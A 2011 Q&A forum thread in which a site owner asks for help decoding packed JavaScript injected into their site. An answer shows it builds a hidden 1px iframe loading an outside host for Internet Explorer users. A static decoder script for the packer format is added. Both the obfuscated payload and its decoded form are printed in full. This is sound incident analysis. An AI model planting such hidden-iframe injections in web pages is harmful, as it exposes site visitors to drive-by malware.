JavaScript code injected into site: Can you help me decrypt it?

ARandomGenericShrub · Oct 14, 2011 · Viewed 16.6k times

Recently I was the victim of a web attack, which seemed to take various PHP server vars, then forward them to an attacker's website (IPs of visitor/website, referrer, useragent, etc.). Then it would get the file it sent the URL request to, and echo() it to source.

I know you get MANY of these sorts of requests (mostly as poor man's XSS attempts), but I would really appreciate some help here, as I don't have much experience with JS. It took me several hours of PHP unscrambling to figure out what it did, and after passing some dummy info, it returned this (which was being echoed into source):

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|25u|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|500|asso|navigator|com|showthread|php|72291731'.split('|'),0,{}))

Thank you for your time and patience with this matter.

Answer

Christian · Oct 14, 2011

Simply replace eval with alert.

It yields the following:

function MakeFrameEx(){
    element=document.getElementById('yahoo_api');
    if(!element){
        var el=document.createElement('iframe');
        document.body.appendChild(el);
        el.id='yahoo_api';
        el.style.width='1px';
        el.style.height='1px';
        el.style.display='none';
        el.src='http://asso.25u.com/showthread.php?t=72291731'
    }
}

var ua=navigator.userAgent.toLowerCase();

if(((ua.indexOf("msie")!=-1
    &&ua.indexOf("opera")==-1
    &&ua.indexOf("webtv")==-1))
    &&ua.indexOf("windows")!=-1)
{
    var t=setTimeout("MakeFrameEx()",500);
}

After doing the alert(), press CTRL+C on the dialog to get the contents, then use a JS Beautifier to get some readable code.


Also note that for some browsers, like Firefox, there are plugins to do this automatically. Some browsers even do this automatically (MSIE).
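Added example, not part of the original question or answer: a static decoder for the `eval(function(p,a,c,k,e,d){...})` wrapper shown in the question, which recovers the script by table substitution without running any of the injected code. The function names (`unpack`, `encodeIndex`, `unquote`) and the sample string are constructed for illustration, and the decoder assumes the wrapper form and word-index encoding seen above (radix up to 62).

```javascript
// Added example: static decoder for Dean Edwards "p,a,c,k,e,d" packer output.
// Nothing from the packed script is evaluated; it is only parsed and substituted.

// The packer's own index encoding: digits 0-9, a-z, then A-Z (radix up to 62).
function encodeIndex(n, radix) {
  const head = n < radix ? '' : encodeIndex(Math.floor(n / radix), radix);
  const d = n % radix;
  return head + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

// Undo the escapes of a single-quoted JS string literal body (\' \\ \n \r \t).
function unquote(body) {
  const esc = { n: '\n', r: '\r', t: '\t' };
  return body.replace(/\\(.)/g, (_, ch) => esc[ch] || ch);
}

// Matches the call arguments: }('PAYLOAD',RADIX,COUNT,'WORDS'.split('|')
const ARGS = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;

function unpack(source) {
  const m = ARGS.exec(source);
  if (!m) return null;                          // not this wrapper
  const radix = Number(m[2]);
  if (radix < 2 || radix > 62) return null;     // outside the encoding handled here
  const payload = unquote(m[1]);
  const words = unquote(m[4]).split('|');
  const count = Math.min(Number(m[3]), words.length);
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, radix);
    dict.set(token, words[i] || token);         // empty slot: token stands for itself
  }
  return payload.replace(/\b\w+\b/g, (t) => (dict.has(t) ? dict.get(t) : t));
}

// Constructed, harmless sample in the same wrapper shape (unpacker body elided).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* ... */}('3 0=2.4(\'5\')!=-1;',10,6,'ok||ua|var|indexOf|msie'.split('|'),0,{}))`;

console.log(unpack(SAMPLE));
```

Run it with Node.js on a saved copy of the suspicious script text; the output can then go through a beautifier as the answer suggests.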